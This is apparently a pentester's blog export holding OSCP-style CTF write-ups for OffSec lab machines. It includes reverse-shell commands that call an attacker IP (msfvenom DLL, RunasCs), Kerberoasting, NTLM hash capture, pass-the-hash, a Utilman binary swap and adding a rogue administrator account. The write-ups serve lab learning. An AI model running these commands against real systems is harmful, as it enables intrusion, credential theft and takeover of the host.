[{"content":"As a kid, whenever something wasn't working, I would get completely absorbed in figuring out why. I found myself spending hours troubleshooting, diving deep into solutions just for the thrill of solving the problem.\nThis curiosity turned into a passion for penetration testing. It's the same mindset, searching for weak spots, understanding how things work, and breaking down problems.\nNow, as a Computer Science Engineering student, I specialize in cybersecurity and have also worked on several computer vision projects. Outside of tech, I pursue freelance art and serve as the captain of my university's boxing team.\nCertification Timeline # Feb 2024 Career Essentials in CyberSecurity (Microsoft) Apr 2024 Certified in Cybersecurity (CC) - ISC2 Jan 2025 Junior Penetration Tester (eJPTv2) - INE Jun 2025 Certified Red Team Professional (CRTP) - Altered Security Aug 2025 Junior Penetration Tester (PT1) - TryHackMe 10/03/2026 Started preparing for OSCP ","date":"15 April 2026","externalUrl":null,"permalink":"/about/","section":"Muqaram Majid","summary":"","title":"About","type":"about"},{"content":"This page has my CTF writeups, exam prep notes, methodologies, cheatsheets, and random notes, basically everything I\u0026rsquo;ve learned and figured I should share.\nCheck out the Tools I use, Cheatsheets for quick refs, and CTF-Writeups from boxes I\u0026rsquo;ve popped. 
Hope it helps!\n","date":"15 April 2026","externalUrl":null,"permalink":"/","section":"Muqaram Majid","summary":"","title":"Muqaram Majid","type":"page"},{"content":" Access # Overview # OS: Windows AD IP: 192.168.226.187 Difficulty: Hard Platform: OffSec OSCP: Yes Lists: N/A Summary # Uploaded a .htaccess file to bypass the upload filter and get RCE, then privesc by Kerberoasting svc_mssql and abusing SeManageVolumePrivilege.\nLoot # Loot Category Details Usernames Passwords Usernames+Passwords Hashes Service Versions Enumeration # Nmap # PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 80/tcp open http Apache httpd 2.4.48 ((Win64) OpenSSL/1.1.1k PHP/8.0.7) |_http-server-header: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/8.0.7 | http-methods: |_ Potentially risky methods: TRACE |_http-title: Access The Event 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-04-04 12:17:21Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: access.offsec0., Site: Default-First-Site-Name) 443/tcp open ssl/http Apache httpd 2.4.48 ((Win64) OpenSSL/1.1.1k PHP/8.0.7) | ssl-cert: Subject: commonName=localhost | Not valid before: 2009-11-10T23:48:47 |_Not valid after: 2019-11-08T23:48:47 |_http-server-header: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/8.0.7 | http-methods: |_ Potentially risky methods: TRACE |_http-title: Access The Event | tls-alpn: |_ http/1.1 |_ssl-date: TLS randomness does not represent time 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: access.offsec0., Site: Default-First-Site-Name) 3269/tcp open tcpwrapped 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-title: Not Found |_http-server-header: Microsoft-HTTPAPI/2.0 9389/tcp open mc-nmf .NET Message Framing 47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-title: Not Found |_http-server-header: Microsoft-HTTPAPI/2.0 49664/tcp open msrpc Microsoft Windows RPC 49665/tcp open msrpc Microsoft Windows RPC 49666/tcp open msrpc Microsoft Windows RPC 49668/tcp open msrpc Microsoft Windows RPC 49669/tcp open msrpc Microsoft Windows RPC 49670/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 49671/tcp open msrpc Microsoft Windows RPC 49674/tcp open msrpc Microsoft Windows RPC 49679/tcp open msrpc Microsoft Windows RPC 49701/tcp open msrpc Microsoft Windows RPC Dirbusting # Port 80 # Web behavior was the main signal here, so I traced each response change before exploitation.\nThe uploads directory is exposed, so anything we manage to upload can be requested directly.\nExploitation # The likely path is to upload a reverse shell disguised as an image.\nFirst attempt: change the extension of the PHP file.\nNone of the usual variants get through the filter, so the next test is whether a .htaccess file is accepted. The filter only blocks known PHP extensions, and a .htaccess dropped into the uploads directory can tell Apache to run any extension we choose through the PHP handler, so the filter and the server end up disagreeing about what is executable.\nThe .htaccess upload is accepted, so if we rename the PHP file to .dork it should now both pass the filter and execute.\nWith a shell as the web service account, we need credentials for svc_mssql.\nFirst, list the SPNs in the domain:\nObject Name = krbtgt DN = CN=krbtgt,CN=Users,DC=access,DC=offsec Object Cat. = CN=Person,CN=Schema,CN=Configuration,DC=access,DC=offsec servicePrincipalNames SPN( 1 ) = kadmin/changepw Object Name = MSSQL DN = CN=MSSQL,CN=Users,DC=access,DC=offsec Object Cat. 
= CN=Person,CN=Schema,CN=Configuration,DC=access,DC=offsec servicePrincipalNames SPN( 1 ) = MSSQLSvc/DC.access.offsec PS C:\\Users\\Public\\Documents\u0026gt; The MSSQL account has an SPN, so it is Kerberoastable: any domain user can request a service ticket for MSSQLSvc/DC.access.offsec, and that ticket is encrypted with a key derived from the account's password, so it can be cracked offline.\n.\\\\Rubeus.exe kerberoast /outfile:kerberoast.hashes Now crack the hash offline (hashcat mode 13100 for the RC4 TGS-REP format Rubeus writes).\nIt cracked instantly: svc_mssql / trustno1.\nUse RunasCs to switch to that user and get a shell back as svc_mssql:\nInvoke-RunasCs -Username svc_mssql -Password trustno1 -Command cmd.exe -Remote 192.168.45.197:443 Checking privileges in the new shell shows one we did not have before: SeManageVolumePrivilege.\nWe use the SeManageVolume exploit, which gives us write permission over the C: drive, and then follow the DLL hijack below to get an admin shell.\nUsing dllref by Siren Security, we identified that tzres.dll is associated with systeminfo. Normally, running systeminfo just displays system details, but if we plant a malicious tzres.dll where systeminfo will load it, we hijack the process: it executes our reverse shell, which gives us the elevated shell.\nmsfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.xxx LPORT=443 -f dll -o tzres.dll Then just run systeminfo and the shell comes back.\n","date":"4 April 2026","externalUrl":null,"permalink":"/ctf-writeups/access/","section":"CTF Writeups","summary":"","title":"Access","type":"ctf-writeups"},{"content":"","date":"4 April 2026","externalUrl":null,"permalink":"/categories/","section":"Categories","summary":"","title":"Categories","type":"categories"},{"content":"","date":"4 April 2026","externalUrl":null,"permalink":"/categories/ctf-writeups/","section":"Categories","summary":"","title":"CTF Writeups","type":"categories"},{"content":"Focused writeups from boxes and labs I solved, including enumeration flow, exploit path, and privilege escalation notes.\n","date":"4 April 2026","externalUrl":null,"permalink":"/ctf-writeups/","section":"CTF Writeups","summary":"","title":"CTF Writeups","type":"ctf-writeups"},{"content":"","date":"4 April 2026","externalUrl":null,"permalink":"/tags/hard/","section":"Tags","summary":"","title":"Hard","type":"tags"},{"content":" Heist # Overview # OS: Windows AD IP: 192.168.226.165 Difficulty: Hard Platform: 
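The .htaccess bypass in the Access writeup above works because the upload filter and the web server disagree about what is dangerous. The following is an added example, not code from the writeup or from the box: a Python model of a blocklist upload filter beside an allowlist filter, plus the Apache handler lookup that an uploaded .htaccess influences. The .htaccess directive, the blocklist and the allowlist are assumptions (the writeup does not show the box's filter or its .htaccess); .dork is the extension the writeup used.

```python
import os

# .htaccess body an attacker uploads so Apache treats an extra extension as PHP.
# The writeup does not reproduce its .htaccess; this is the standard directive,
# and '.dork' is the extension the writeup renamed its shell to.
HTACCESS_PAYLOAD = 'AddType application/x-httpd-php .dork'

BLOCKED = {'.php', '.php3', '.php4', '.php5', '.phtml', '.phar'}   # assumed blocklist
ALLOWED = {'.jpg', '.jpeg', '.png', '.gif'}                        # assumed allowlist
MAGIC = {'.jpg': bytes([0xFF, 0xD8, 0xFF]), '.jpeg': bytes([0xFF, 0xD8, 0xFF]),
         '.png': bytes([0x89]) + b'PNG', '.gif': b'GIF8'}


def blacklist_filter(filename, content):
    '''Vulnerable filter (the kind the box had): anything whose extension is not
    on the blocklist is stored, including the dotfile .htaccess and shell.dork.'''
    return os.path.splitext(filename)[1].lower() not in BLOCKED


def allowlist_filter(filename, content):
    '''Hardened filter: bare filename only, no dotfiles, allowlisted extension,
    and the content must start with the signature of that image type.'''
    if filename != os.path.basename(filename) or filename.startswith('.'):
        return False
    ext = os.path.splitext(filename)[1].lower()
    return ext in ALLOWED and content.startswith(MAGIC[ext])


def php_extensions(htaccess_text, allow_override):
    '''Extensions Apache hands to the PHP handler inside the upload directory.
    The base config maps only .php; an uploaded .htaccess can extend that, but
    only when AllowOverride permits it (AllowOverride None is the server-side fix).'''
    exts = {'.php'}
    if not allow_override or htaccess_text is None:
        return exts
    for line in htaccess_text.splitlines():
        parts = line.split()
        if len(parts) >= 3 and parts[0] in ('AddType', 'AddHandler') and 'php' in parts[1]:
            exts.update(p.lower() for p in parts[2:])
    return exts


def uploads_that_execute(uploads, filter_fn, allow_override):
    '''Simulate the chain: store each (name, content) the filter accepts, then return
    the names that would execute as PHP when requested from the uploads directory.'''
    stored = {name: data for name, data in uploads if filter_fn(name, data)}
    htaccess = stored.get('.htaccess')
    exts = php_extensions(htaccess.decode() if htaccess else None, allow_override)
    return {name for name in stored if os.path.splitext(name)[1].lower() in exts}


# Constructed attacker uploads: the .htaccess plus a PHP web shell renamed to .dork.
ATTACK = [('.htaccess', HTACCESS_PAYLOAD.encode()),
          ('shell.dork', b'<?php system($_GET[0]); ?>')]

if __name__ == '__main__':
    print(uploads_that_execute(ATTACK, blacklist_filter, True))   # {'shell.dork'}
    print(uploads_that_execute(ATTACK, allowlist_filter, True))   # set()
    print(uploads_that_execute(ATTACK, blacklist_filter, False))  # set()
```

The third call is the point for defenders: even with the weak filter in place, AllowOverride None in the uploads directory makes the .htaccess inert, so the extension mapping stays at .php and shell.dork is served as a plain file.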
OffSec OSCP: Yes Lists: N/A Summary # SSRF in the web proxy leaks a NetNTLMv2 hash, then read a gMSA password and privesc with SeRestorePrivilege.\nLoot # Loot Category Details Usernames Passwords Usernames+Passwords Hashes Service Versions Enumeration # Nmap # PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-04-04 18:55:23Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: heist.offsec0., Site: Default-First-Site-Name) 3269/tcp open tcpwrapped 3389/tcp open ms-wbt-server Microsoft Terminal Services | rdp-ntlm-info: | Target_Name: HEIST | NetBIOS_Domain_Name: HEIST | NetBIOS_Computer_Name: DC01 | DNS_Domain_Name: heist.offsec | DNS_Computer_Name: DC01.heist.offsec | DNS_Tree_Name: heist.offsec | Product_Version: 10.0.17763 |_ System_Time: 2026-04-04T18:56:18+00:00 | ssl-cert: Subject: commonName=DC01.heist.offsec | Not valid before: 2026-04-03T18:53:34 |_Not valid after: 2026-10-03T18:53:34 |_ssl-date: 2026-04-04T18:56:58+00:00; -1s from scanner time. 
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-title: Not Found |_http-server-header: Microsoft-HTTPAPI/2.0 8080/tcp open http Werkzeug httpd 2.0.1 (Python 3.9.0) |_http-title: Super Secure Web Browser |_http-server-header: Werkzeug/2.0.1 Python/3.9.0 49666/tcp open msrpc Microsoft Windows RPC 49667/tcp open msrpc Microsoft Windows RPC 49673/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 49674/tcp open msrpc Microsoft Windows RPC 49677/tcp open msrpc Microsoft Windows RPC Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running (JUST GUESSING): Microsoft Windows 2019|10 (92%) OS CPE: cpe:/o:microsoft:windows_server_2019 cpe:/o:microsoft:windows_10 Aggressive OS guesses: Windows Server 2019 (92%), Microsoft Windows 10 1903 - 21H1 (85%), Microsoft Windows 10 1607 (85%) No exact OS matches for host (test conditions non-ideal). Network Distance: 4 hops Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: | smb2-time: | date: 2026-04-04T18:56:19 |_ start_date: N/A | smb2-security-mode: | 3:1:1: |_ Message signing enabled and required Dirbusting # Port 8080 # Web behavior was the main signal here, so I traced each response change before exploitation.\nExploitation # The app on port 8080 fetches whatever URL we give it server-side, so there is SSRF at play.\nSet up Responder with the -wv switches and point the app at our own listener, http://192.168.45.177:80. The server-side fetcher answers Responder's NTLM challenge with the credentials of the account it runs as, and we capture this:\n[HTTP] Sending NTLM authentication request to 192.168.226.165 [HTTP] GET request from: ::ffff:192.168.226.165 URL: / [HTTP] NTLMv2 Client : 192.168.226.165 [HTTP] NTLMv2 Username : HEIST\\enox [HTTP] NTLMv2 Hash : enox::HEIST:787ff23f3cc5c6d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SMB signing is required on the DC (see the smb2-security-mode result above), so relaying this to SMB is not an option; cracking the NetNTLMv2 hash (hashcat mode 5600) gives the password for enox: california.\nWith enox we can read the gMSA password of svc_apache$, which only works because enox is permitted to retrieve the managed password:\n.\\gmsapasswordreader.exe --accountname svc_apache$ The tool prints the current NT hash of the gMSA, and we can use 
this hash to authenticate over WinRM (pass-the-hash, no cleartext needed):\nevil-winrm -i heist.pg -u svc_apache$ -H 654D2E4EBE552389CD0FD7414DE561C0 As svc_apache$ we have SeRestorePrivilege, which bypasses file ACLs for write operations, so we can overwrite or replace binaries anywhere, including in System32.\nThe classic abuse is to swap cmd.exe in for the accessibility binary that the logon screen launches:\ncd C:\\\\Windows\\\\system32 ren Utilman.exe Utilman.old ren cmd.exe Utilman.exe Then, from another terminal, rdesktop to the box and press Windows + U on the logon screen: Utilman.exe now starts cmd.exe as SYSTEM. (Renaming cmd.exe removes it from System32 for everyone; copying it over Utilman.exe instead of renaming avoids that, and Utilman.old lets you restore the original afterwards.)\nAnother writeup suggests this approach if we did not have GUI access:\nAlternatively, I came across this script SeRestoreAbuse.exe which enables us to run a command as SYSTEM if the SeRestorePrivilege is enabled, as in our case. I downloaded the script from here, uploaded it to the Windows machine and ran nc. ","date":"4 April 2026","externalUrl":null,"permalink":"/ctf-writeups/heist/","section":"CTF Writeups","summary":"","title":"Heist","type":"ctf-writeups"},{"content":"","date":"4 April 2026","externalUrl":null,"permalink":"/tags/oscp/","section":"Tags","summary":"","title":"Oscp","type":"tags"},{"content":"","date":"4 April 2026","externalUrl":null,"permalink":"/tags/","section":"Tags","summary":"","title":"Tags","type":"tags"},{"content":"","date":"4 April 2026","externalUrl":null,"permalink":"/tags/windows/","section":"Tags","summary":"","title":"Windows","type":"tags"},{"content":" Medjed # Overview # OS: Windows IP: 192.168.167.127 Difficulty: Hard Platform: OffSec OSCP: Yes Lists: N/A Summary # Easy RCE, then privesc via BarracudaServer.\nLoot # Loot Category Details Usernames Passwords Usernames+Passwords Hashes Service Versions Enumeration # Nmap # nmap -p- 192.168.167.127 -Pn -sCV -A --min-rate=20000 Starting Nmap 7.95 ( https://nmap.org ) at 2026-04-03 09:32 EDT Warning: 192.168.167.127 giving up on port because retransmission cap hit (10). Nmap scan report for 192.168.167.127 Host is up (0.083s latency). 
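The Heist writeup above works because the web app's fetcher followed an attacker-supplied URL and then answered Responder's NTLM challenge with its own account. The Python below is an added example (not the application's code and not from the writeup) showing the destination-side half of the fix: a naive fetcher that takes any URL, beside one that allowlists scheme and host and checks the resolved address. The allowlisted host, the DNS answers and the probe URLs are constructed for the example. The other half, which this code cannot show, is a client setting: the fetching process must not present its credentials automatically to any server that challenges it.

```python
import ipaddress
from urllib.parse import urlsplit

# Assumptions for this example: the application only needs to reach one external
# site, so it is allowlisted by name; everything else is refused before any connection.
ALLOWED_HOSTS = {'www.example.com'}
ALLOWED_SCHEMES = {'http', 'https'}


def vulnerable_target(url):
    '''What the Heist-style browser did: fetch whatever URL the user supplied.
    Returns the URL unchanged, i.e. no restriction at all.'''
    return url


def safe_target(url, resolver):
    '''Hardened version. Rejects non-HTTP schemes, embedded credentials, hosts that
    are not allowlisted, and names that resolve to loopback/private/link-local space.
    resolver(hostname) -> list of IP strings is injected so the example runs offline;
    in production resolve once here and connect to the returned address, so a DNS
    rebind between check and connect cannot change the destination.'''
    parts = urlsplit(url)
    if parts.scheme not in ALLOWED_SCHEMES:
        raise ValueError('scheme not allowed: %r' % parts.scheme)
    if parts.username is not None or parts.password is not None:
        raise ValueError('credentials in URL are not allowed')
    host = (parts.hostname or '').lower()
    if host not in ALLOWED_HOSTS:
        raise ValueError('host not allowlisted: %r' % host)
    addrs = [ipaddress.ip_address(a) for a in resolver(host)]
    if not addrs:
        raise ValueError('host did not resolve')
    for addr in addrs:
        if not addr.is_global:          # loopback, RFC1918, link-local, unspecified...
            raise ValueError('%s resolves to non-public address %s' % (host, addr))
    port = parts.port or (443 if parts.scheme == 'https' else 80)
    return (parts.scheme, host, port, str(addrs[0]))


def is_allowed(url, resolver):
    '''Boolean wrapper used by the demo and tests.'''
    try:
        safe_target(url, resolver)
        return True
    except ValueError:
        return False


# Constructed DNS answers: a normal answer, and a rebinding answer for the same name.
NORMAL_DNS = {'www.example.com': ['93.184.216.34']}
REBOUND_DNS = {'www.example.com': ['127.0.0.1']}


def normal_resolver(host):
    return NORMAL_DNS.get(host, [])


def rebound_resolver(host):
    return REBOUND_DNS.get(host, [])


# Probe URLs in the spirit of the writeup: the legitimate site, an attacker listener
# on the lab network, a local file read, and a URL carrying credentials.
PROBES = ['http://www.example.com/',
          'http://192.168.45.177:80/',
          'file:///C:/Windows/win.ini',
          'http://user:pass@www.example.com/']

if __name__ == '__main__':
    for url in PROBES:
        print(url, '| naive fetcher uses it as-is:', vulnerable_target(url) == url,
              '| hardened allows:', is_allowed(url, normal_resolver))
    print('allowlisted name rebound to 127.0.0.1 allowed:',
          is_allowed('http://www.example.com/', rebound_resolver))  # False
```

The resolved-address check is what catches the case the allowlist alone misses: a permitted hostname whose DNS answer has been pointed at loopback or at an internal address.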
Not shown: 65215 closed tcp ports (reset), 303 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds? 3306/tcp open mysql MariaDB 10.3.24 or later (unauthorized) 5040/tcp open unknown 8000/tcp open http-alt BarracudaServer.com (Windows) | http-methods: |_ Potentially risky methods: PROPFIND PUT COPY DELETE MOVE MKCOL PROPPATCH LOCK UNLOCK | http-open-proxy: Potentially OPEN proxy. |_Methods supported:CONNECTION |_http-title: Home | fingerprint-strings: | FourOhFourRequest, Socks5: | HTTP/1.1 200 OK | Date: Fri, 03 Apr 2026 13:32:59 GMT | Server: BarracudaServer.com (Windows) | Connection: Close | GenericLines, GetRequest: | HTTP/1.1 200 OK | Date: Fri, 03 Apr 2026 13:32:53 GMT | Server: BarracudaServer.com (Windows) | Connection: Close | HTTPOptions, RTSPRequest: | HTTP/1.1 200 OK | Date: Fri, 03 Apr 2026 13:33:04 GMT | Server: BarracudaServer.com (Windows) | Connection: Close | SIPOptions: | HTTP/1.1 400 Bad Request | Date: Fri, 03 Apr 2026 13:34:08 GMT | Server: BarracudaServer.com (Windows) | Connection: Close | Content-Type: text/html | Cache-Control: no-store, no-cache, must-revalidate, max-age=0 |_ \u0026lt;html\u0026gt;\u0026lt;body\u0026gt;\u0026lt;h1\u0026gt;400 Bad Request\u0026lt;/h1\u0026gt;Can\u0026#39;t parse request\u0026lt;p\u0026gt;BarracudaServer.com (Windows)\u0026lt;/p\u0026gt;\u0026lt;/body\u0026gt;\u0026lt;/html\u0026gt; | http-webdav-scan: | Server Type: BarracudaServer.com (Windows) | WebDAV type: Unknown | Allowed Methods: OPTIONS, GET, HEAD, PROPFIND, PUT, COPY, DELETE, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK |_ Server Date: Fri, 03 Apr 2026 13:35:40 GMT |_http-server-header: BarracudaServer.com (Windows) 30021/tcp open ftp FileZilla ftpd 0.9.41 beta | ftp-anon: Anonymous FTP login allowed (FTP code 230) | -r--r--r-- 1 ftp ftp 536 Nov 03 2020 .gitignore | drwxr-xr-x 1 ftp ftp 0 Nov 03 2020 app | drwxr-xr-x 
1 ftp ftp 0 Nov 03 2020 bin | drwxr-xr-x 1 ftp ftp 0 Nov 03 2020 config | -r--r--r-- 1 ftp ftp 130 Nov 03 2020 config.ru | drwxr-xr-x 1 ftp ftp 0 Nov 03 2020 db | -r--r--r-- 1 ftp ftp 1750 Nov 03 2020 Gemfile | drwxr-xr-x 1 ftp ftp 0 Nov 03 2020 lib | drwxr-xr-x 1 ftp ftp 0 Nov 03 2020 log | -r--r--r-- 1 ftp ftp 66 Nov 03 2020 package.json | drwxr-xr-x 1 ftp ftp 0 Nov 03 2020 public | -r--r--r-- 1 ftp ftp 227 Nov 03 2020 Rakefile | -r--r--r-- 1 ftp ftp 374 Nov 03 2020 README.md | drwxr-xr-x 1 ftp ftp 0 Nov 03 2020 test | drwxr-xr-x 1 ftp ftp 0 Nov 03 2020 tmp |_drwxr-xr-x 1 ftp ftp 0 Nov 03 2020 vendor | ftp-syst: |_ SYST: UNIX emulated by FileZilla |_ftp-bounce: bounce working! 33033/tcp open unknown | fingerprint-strings: | GenericLines: | HTTP/1.1 400 Bad Request | GetRequest, HTTPOptions: | HTTP/1.0 403 Forbidden | Content-Type: text/html; charset=UTF-8 | Content-Length: 3102 | \u0026lt;!DOCTYPE html\u0026gt; | \u0026lt;html lang=\u0026#34;en\u0026#34;\u0026gt; | \u0026lt;head\u0026gt; | \u0026lt;meta charset=\u0026#34;utf-8\u0026#34; /\u0026gt; | \u0026lt;title\u0026gt;Action Controller: Exception caught\u0026lt;/title\u0026gt; | \u0026lt;style\u0026gt; | body { | background-color: #FAFAFA; | color: #333; | margin: 0px; | body, p, ol, ul, td { | font-family: helvetica, verdana, arial, sans-serif; | font-size: 13px; | line-height: 18px; | font-size: 11px; | white-space: pre-wrap; | pre.box { | border: 1px solid #EEE; | padding: 10px; | margin: 0px; | width: 958px; | header { | color: #F0F0F0; | background: #C52F24; | padding: 0.5em 1.5em; | margin: 0.2em 0; | line-height: 1.1em; | font-size: 2em; | color: #C52F24; | line-height: 25px; | .details { |_ bord 44330/tcp open ssl/unknown |_ssl-date: 2026-04-03T13:36:08+00:00; 0s from scanner time. 
| ssl-cert: Subject: commonName=server demo 1024 bits/organizationName=Real Time Logic/stateOrProvinceName=CA/countryName=US | Not valid before: 2009-08-27T14:40:47 |_Not valid after: 2019-08-25T14:40:47 45332/tcp open http Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1g PHP/7.3.23) |_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.3.23 |_http-title: Quiz App | http-methods: |_ Potentially risky methods: TRACE 45443/tcp open http Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1g PHP/7.3.23) | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.3.23 |_http-title: Quiz App 49664/tcp open msrpc Microsoft Windows RPC 49665/tcp open msrpc Microsoft Windows RPC 49666/tcp open msrpc Microsoft Windows RPC 49667/tcp open msrpc Microsoft Windows RPC 49668/tcp open msrpc Microsoft Windows RPC 49669/tcp open msrpc Microsoft Windows RPC 2 services unrecognized despite returning data. If you know the s FTP # |_http-server-header: BarracudaServer.com (Windows) 30021/tcp open ftp FileZilla ftpd 0.9.41 beta | ftp-anon: Anonymous FTP login allowed (FTP code 230) | -r--r--r-- 1 ftp ftp 536 Nov 03 2020 .gitignore | drwxr-xr-x 1 ftp ftp 0 Nov 03 2020 app | drwxr-xr-x 1 ftp ftp 0 Nov 03 2020 bin | drwxr-xr-x 1 ftp ftp 0 Nov 03 2020 config | -r--r--r-- 1 ftp ftp 130 Nov 03 2020 config.ru | drwxr-xr-x 1 ftp ftp 0 Nov 03 2020 db | -r--r--r-- 1 ftp ftp 1750 Nov 03 2020 Gemfile | drwxr-xr-x 1 ftp ftp 0 Nov 03 2020 lib | drwxr-xr-x 1 ftp ftp 0 Nov 03 2020 log | -r--r--r-- 1 ftp ftp 66 Nov 03 2020 package.json | drwxr-xr-x 1 ftp ftp 0 Nov 03 2020 public | -r--r--r-- 1 ftp ftp 227 Nov 03 2020 Rakefile | -r--r--r-- 1 ftp ftp 374 Nov 03 2020 README.md | drwxr-xr-x 1 ftp ftp 0 Nov 03 2020 test | drwxr-xr-x 1 ftp ftp 0 Nov 03 2020 tmp |_drwxr-xr-x 1 ftp ftp 0 Nov 03 2020 vendor | ftp-syst: |_ SYST: UNIX emulated by FileZilla |_ftp-bounce: bounce working! 
33033/tcp open unknown | fingerprint-strings: Dirbusting # Port 8000 # Web behavior was the main signal here, so I traced each response change before exploitation.\nExploitation # Let's go here, the BarracudaServer on port 8000 (the scan already showed PUT and the other WebDAV methods are allowed on it).\nNothing happened at first: I had uploaded outside the web root.\nThis directory is the web root of the Quiz App we saw earlier (ports 45332 and 45443), so upload the shell here and browse to it.\nAnd we are in.\n","date":"3 April 2026","externalUrl":null,"permalink":"/ctf-writeups/medjed/","section":"CTF Writeups","summary":"","title":"Medjed","type":"ctf-writeups"},{"content":" Nickel # Overview # OS: Windows IP: 192.168.117.99 Difficulty: Hard Platform: OffSec OSCP: Yes Lists: N/A Summary # An exposed API endpoint leaked weak credentials; privesc through a locally hosted web app that passes its arguments to a command.\nLoot # Loot Category Details Usernames Passwords Usernames+Passwords Hashes Service Versions Enumeration # Nmap # PORT STATE SERVICE VERSION 21/tcp open ftp FileZilla ftpd 0.9.60 beta | ftp-syst: |_ SYST: UNIX emulated by FileZilla 22/tcp open ssh OpenSSH for_Windows_8.1 (protocol 2.0) | ssh-hostkey: | 3072 86:84:fd:d5:43:27:05:cf:a7:f2:e9:e2:75:70:d5:f3 (RSA) | 256 9c:93:cf:48:a9:4e:70:f4:60:de:e1:a9:c2:c0:b6:ff (ECDSA) |_ 256 00:4e:d7:3b:0f:9f:e3:74:4d:04:99:0b:b1:8b:de:a5 (ED25519) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds? 3389/tcp open ms-wbt-server Microsoft Terminal Services | ssl-cert: Subject: commonName=nickel | Not valid before: 2025-12-06T11:11:21 |_Not valid after: 2026-06-07T11:11:21 |_ssl-date: 2026-04-02T13:07:47+00:00; 0s from scanner time. | rdp-ntlm-info: | Target_Name: NICKEL | NetBIOS_Domain_Name: NICKEL | NetBIOS_Computer_Name: NICKEL | DNS_Domain_Name: nickel | DNS_Computer_Name: nickel | Product_Version: 10.0.18362 |_ System_Time: 2026-04-02T13:06:39+00:00 5040/tcp open unknown 7680/tcp open pando-pub? 8089/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-title: Site doesn\u0026#39;t have a title. 
|_http-server-header: Microsoft-HTTPAPI/2.0 33333/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Site doesn\u0026#39;t have a title. 49664/tcp open msrpc Microsoft Windows RPC 49665/tcp open msrpc Microsoft Windows RPC 49666/tcp open msrpc Microsoft Windows RPC 49667/tcp open msrpc Microsoft Windows RPC 49668/tcp open msrpc Microsoft Windows RPC 49669/tcp open msrpc Microsoft Windows RPC Dirbusting # Port 8089 # Web behavior was the main signal here, so I traced each response change before exploitation.\nClicking the buttons does nothing visible in the browser.\nThey call the API on port 33333 with GET.\nWhen we curl that endpoint ourselves, it responds with this.\nSo let's try POST.\nExploitation # name : cmd.exe commandline : cmd.exe C:\\windows\\system32\\DevTasks.exe --deploy C:\\work\\dev.yaml --user ariah -p \u0026#34;Tm93aXNlU2xvb3BUaGVvcnkxMzkK\u0026#34; --server nickel-dev --protocol ssh The response is a process listing, and one command line is an SSH deployment job with a username and password on it, so let's SSH in as ariah.\nThat didn't work at first; then I noticed the -p value is base64-encoded rather than the literal password. Decoding it gives the real password (the trailing K encodes a newline, so strip it before use).\nAnd we are in.\nGrabbing the PDF file and cracking its password with pdf2john, we see this:\nnetstat shows port 80 open locally, which the external scan never saw.\nAnd then:\nnet localgroup Administrators fatcat /add net localgroup \u0026#39;Remote Desktop Users\u0026#39; fatcat /add Now we can just RDP in:\n└─$ xfreerdp /cert:ignore /dynamic-resolution +clipboard /u:\u0026#39;fatcat\u0026#39; /p:\u0026#39;password\u0026#39; /v:NICKEL ","date":"2 April 2026","externalUrl":null,"permalink":"/ctf-writeups/nickel/","section":"CTF Writeups","summary":"","title":"Nickel","type":"ctf-writeups"},{"content":" Shenzi # Overview # OS: Windows IP: 192.168.117.55 Difficulty: Hard Platform: OffSec OSCP: Yes Lists: N/A Summary # Initial access through the WordPress theme editor, privesc with AlwaysInstallElevated.\nLoot # Loot Category Details Usernames Passwords Usernames+Passwords Hashes Service Versions Enumeration # Nmap # Not shown: 65339 closed tcp ports (reset), 181 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 21/tcp open ftp FileZilla ftpd 0.9.41 beta | 
